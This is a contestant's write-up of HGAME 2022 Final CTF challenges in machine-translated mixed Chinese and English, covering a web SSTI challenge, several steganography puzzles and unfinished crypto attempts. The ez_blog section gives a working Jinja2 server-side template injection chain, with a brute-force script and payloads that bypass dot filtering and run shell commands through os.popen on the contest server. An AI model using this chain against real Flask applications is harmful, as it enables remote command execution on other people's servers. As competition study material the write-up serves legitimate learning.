HGAME 2022 Final writeup by ek1ng

关于排名

WEB

ez_blog

抢完misccome back after a bloodweb了,After a brief look at the two questions, I decided to read it firstez_blog这个题,The reason is simple,sqlI'm really not familiar with injection,Be sure to study hard after the game,Then this question is also an injection point that can be found relatively quickly. I think it is a good idea to do it,就差不多8-11out around the pointmisc后11点到17Some are doing the topic this time.

Direct access can see onehexo搭建的网站,Then whatever is accessed is onlyThe specified key does not exist,only one place to jump tosummer的github,just looksummer的GitHubI found that the theme of this blog was changed by him..

Search found a post that shouldn't be retrieving contentHCTF flask session,I don't really understand why I can retrieve this, but I thought it was really related and looked at it,The content inside reminds meGitHubThe warehouse may have leaked content,去看看summer的仓库.

Okay, nothing seems to be found,I decided to go ahead and see whykey does not exist

key does not exist就是说url存在一些问题,Is it that when this site is deployed, onlyindex.htmlThen all the other pages have been deleted?？

If you lose any path, the same echo will be displayed.,Is there aindex.html么,Then I think I can only findhexo的cveThen see if you can beat it

首先hexo是个js写的,then searchedcve也就是一些xssmore holes,Here is no obviousxssI think,Seems like the problem has to go around,为啥The specified key does not exist

I found direct accessindex.html 或者 index.js也都不行,After thinking about it, the problem should still appear here

oh ok should enterhttp://146.56.223.34:61289/#/index.htmlMissing routing anchors

在summerYour own blog,After the jump, the path will not be added/static,But I tried removing it to no avail

The problem seems to be righturlThere seems to be a problem with the stitching,I'm guessing maybe through someurloperations on and then be able to accessflag文件吧,It's time to eat

Came back from dinner and put it awayhint:提示注意http报文的server字段,It looks like it's all detours ahead.

那我们使用burpsuite抓包看一看

All in all I caught5A different package,The first is to directly visit the webpage to be able to grab3个包,会发起get请求获取网页内容,and then send a request tosearch.xml,然后请求busuanzi.ibruce.info,This is used to count the number of visitors to the website,访问/staticTwo packages can be caught,会先GET请求/static然后再添加一个Upgrade-Insecure-Requests: 1The request header of the request again,So many bags in total.

然后hint让我们注意server字段,We can see it in the response headers in the various packets sent to the websiteserver: Werkzeug/2.0.3 Python/3.11.0a5,然后我们看一下Werkzeug是个啥

Werkzeug是一个WSGI工具包,他可以作为一个Web框架的底层库.利用python/http/server.pyThe library implements a simplehttp服务器.Here I also want to understand why I found it beforeflask的内容,Because the server is in useWerkzeug.

Learn about vulnerabilities andWerkzeug有关后,Do a search and there will be manyflask debuggerOpen hole,sstiVulnerability or something,因为flask的底层实现是Werkzeug,有可能是SSTI的漏洞,但是SSTINeed to server receives the parameters,I feel like there is no place to pass,应该不是.

https://www.anquanke.com/post/id/226900

nice找到洞了

This place where the path parameter existsssti漏洞

flag,config被过滤了

找了一些payload,基本上都是500,Can't fight to the death,Ask the questioner,The questioner said that the injection point is right, but it needs to be studied furtherpayload,remind mepython版本,python版本3.11.0a5,is a new version released a week ago,看来pyloadThe problem that can't get through is here,Check out the new version.

jinjia2 ssti常用的套路

随便找个倒霉的内置类：[]、”” 通过这个类获取到object类：base__、__bases__、__mro 通过object类获取所有子类：subclasses() Find the class that can be exploited in the subclass list 直接调用类下面函数或使用该类空间下可用的其他模块的函数

然后看看python3.11.0a5有什么新内容

到目前为止,New major new features and changes include：

• PEP 657 - Include fine-grained error locations in backtraces
• PEP 654 – Exception Groups and Exceptions*
• PEP 673 - 自我类型
• PEP 646 - 可变参数泛型
• Faster Cpython 项目has produced some exciting results：与 3.10.0 相比,这个版本的 CPython 3.11 Faster than the geometric mean of the performance benchmark by approx.19 % .

I think the reminder of the new version is telling mepayloadOnly this latest version exists,It's a problem caused by a new update,So take a closer look at the update,Here is a total is updated4个内容,Check it out one by one

• A new standard exception type,ExceptionGroupRepresents a set of unrelated exceptions propagating together.
• except*a new processing syntaxExceptionGroups.
• 引入TypeVar,Allows creation of generics parameterized with a single type.
• We introduced a kind of special formSelf,It represents a type variable bound to the encapsulated class.

It really doesn't seem to matter.…I looked at it carefully, I think really has nothing to do,卡在这里了,Will go to themiscLet's see if we can get another onemisc

In addition to finding the injection point, the above are some crooked ways

Finally, with the help of the big guys in the association, I got a blood,very difficult to tell the truth

First of all is the need to find a problem,.被编码了,也就是说不能用.find base class,How to find out first.This question is coded

尝试payload/{{'abc'}}和/{{'abc'.__class__}}以及{{'abc.__class__'}},发现.被过滤了,Then the first thing to do is to solve.How to bypass the problem,因为sstiIf you inject, you first need to find the base class,then find theRCE的类,再RCE对吧,According to these twoFlask-jinja2 SSTI 的利用和Understanding Template Injection Vulnerabilities,we can know using|attr(‘’)来替代.,Then we can gradually inject.

After gradually injecting, we will find that,subclassesis to get the base class,There are many base classes but can be usedos模块能实现rce的,需要找,Write a this timepythonScripts can do the trick

import requests

counter = 0
while True:
    payload = '()|attr("__class__")|attr("__base__")|attr("__subclasses__")()|attr("__getitem__")(%s)|attr("__init__")|attr("__globals__")|attr("__getitem__")("sys")' % counter
    url = 'http://146.56.223.34:61289/{{%s}}' % payload
    r = requests.get(url)
    if "404" in r.text:
        print(counter)
        break
    counter += 1

return result after running100,Heart really nervous about this script running anyway,The result is quite surprise,find achievableRCEThe base class is a very critical step,接下来我们就调用os模块的popenTake a look at the contents of the directory

此时的payload:http://146.56.223.34:61289/{{()|attr("__class__")|attr("__base__")|attr("__subclasses__")()|attr("__getitem__")(100)|attr("__init__")|attr("__globals__")|attr("__getitem__")("sys")|attr("modules")|attr("__getitem__")("os")|attr("popen")("ls /")|attr("read")()}}

发现有flag和readflag,那么flagWe don't have read permission for the file,但是可以通过执行readflagthis program to readflag文件

最终payload:http://146.56.223.34:61289/{{()|attr("__class__")|attr("__base__")|attr("__subclasses__")()|attr("__getitem__")(100)|attr("__init__")|attr("__globals__")|attr("__getitem__")("sys")|attr("modules")|attr("__getitem__")("os")|attr("popen")("/readflag")|attr("read")()}}

然后的话linuxSome of the commands are really unfamiliar,last readflagIt's been tossing for a long time,That's so urgent（,Also good is narrowly missed finished,I actually find early injection point,I think the two keys to solving problems are to first be able to discover.被过滤了,Then the second is to find theRCE的基类,The next step is to go step by step, it is relatively smooth..

pokemon v2

come back from dinner18点了,Still have the last two hours to decide to try thissql注入,Although I feel that taking this time to see the password may be able to come out200Divided, but after thinking about it, I have to concentrate on itwebWell, just look at this,make half

First of all, the injection point has been said andweek2中pokemon一样,It is trying to inject bai

The two articles and source code given,The source code tells what to filter and then one is21年hgame week4的sqlAnother injection question issqlSome methods of injection around the filter

Filtering is strict,而且union,substreverything is filtered,then you can'tweek2一样union注入了,只能盲注了

First, think about how to bypass filtering and how to bet blindly.,给出的21年week4Used in the title of the implantation of the time the blinds,试试看吧

really can't do it,Let's look at the password,sqlInject really learned ineptitude,D^3的sqlThe injection was also done at the time and it was not done for a long time,Go back and make up for it！！！

MISC

hgame真好玩

In fact, it is true that every stephgame出现了,But there are still some cards to do. I chose to open this question at the beginning.200I think it can be won quickly,Although finally got1Blood but it was done for more than two hours,Some steps are still stuck for a while.

The attachment I got is a fragment of the QR code,First spell the QR code,pptblack background,It's easy to see the edges,There's a missing foot on the bottom that needs to be patched,Scan the code to get a string of characters,Cue Memorieshgame.顺带一提,aposeThe online decoding tool is really strong,Much easier to use than other pheasant websites

This is zero-width character steganography,Get a new attachment using online site extraction

Discovery is an audio,The first half can be found from the spectrogram 56418

后半段是sstv隐写,RXSSTVI don't know why I can't figure it out,I guess it's a problem with the microphone not detecting the audio input,Then my embarrassing phone use toolrobot36Connect the bluetooth headset to the computer and put the bluetooth headset on the phone to play sound,可以得到fghiulz

At this point, I thought that the splicing of the two parts is the whole password.,life and death can't make it out,使用archprThe blasting also found that the password is not a pure number and there are more digits,stuck here,I went to see other topics,Then I watched it for a while and got pissed,Keep coming back and thinking about why the password is wrong,想到了silenteyea possibly hidden part,Found that hides a indeed

slilenteyealso available in 5663AZ

Then the three parts are randomly combined,总共6种可能,After trying to found the zip codefghiulz564185663AZ

得到一张图片

lsbLSB steganography by column,发现base64编码的字符

将base64Convert the encoded string to an image

这是data matrix编码,decoded onlineflag

Test your Python

This is the last issue,It's really a bit of a brain hole, and it's a bit hard to think about it.,但是我觉得miscstill logical,尤其是miscThe topic needs to be carefully looked at

题目描述:Test your Python Does anyone really get it done?？ Test是什么意思,Will someone really finish it? What does this sarcasm mean?,然后给出的hint help()how to use,These all point to one thing,forThis cycle is impossible to go around,No direct output at all,But the possible thing is that we look directly atimport进来的模块secret的内容,to view directlyflag,This things to think of words should be in the first place,为什么要给这个hint,help()It is a command to check the usage of functions.,If you really let you usehelpCheck how to make this value become64,Can't Baidu find the corresponding usage?,This obviously does not givehint的本意,这hintThe intention is to let you usehelp()bypass the loop,This thing is absolutely true,So according tohint,And someone after they finish writing a topic in seconds out of this problem,I think it must be just one step away,Because no one can get itflagThen the direct submission is the second blood does not submit, right?,结合这些思考,Just enterhelp(),然后再在help中直接输入secret,You can see the information of the imported module,自然flagvariables are there too

签到

Xiti signed a blood（,Faster this time

HGAME LSB

Judging by the score and the number of people is a defenseAK的难题,Also didn't open this thread,In the last moment, I can't quite do it. Let's take a look.

Must be a magicianLSB隐写题目,（（（（really no idea,There is a web page on the server that receives pictures,then gave a picture,I guess it may be based on the source code to give the picture.LSBSteganography and then can typeflag？

CRYPTO

lfsr

也没什么思路

子集和

I understand this algorithm of subset sum,But I don't know how to get started

ez_rsa

I see two people have this password,So also is to have a look

is a variant of the common mode attack,Euler function is done on the hands and feet,p**3*q为n的话,phi就为（p-1）*p**2*（q-1）,Then it got stuck

This question must be understood in the paper,I really don't understand（（（（（（（

总结

webIt's a pity that there is only one question,无奈sqlInjectology stinks plusez_blogtook me half the time,Then make one at the beginning and one at the endmisc,miscStill play well,

lsbThat question is also on defenseakyes it should,The strategy of the game is pretty good,I got it relatively smoothlyhgamethis memoir,And have been doing in the middleez_blog,在summerAfter many prompts, I also won this question, and then I came back for dinner to see if there were any simple questions.test_your_python,lfsrThere is a chance, but the last time is really not enough,I have to make up for it when I go backsql注入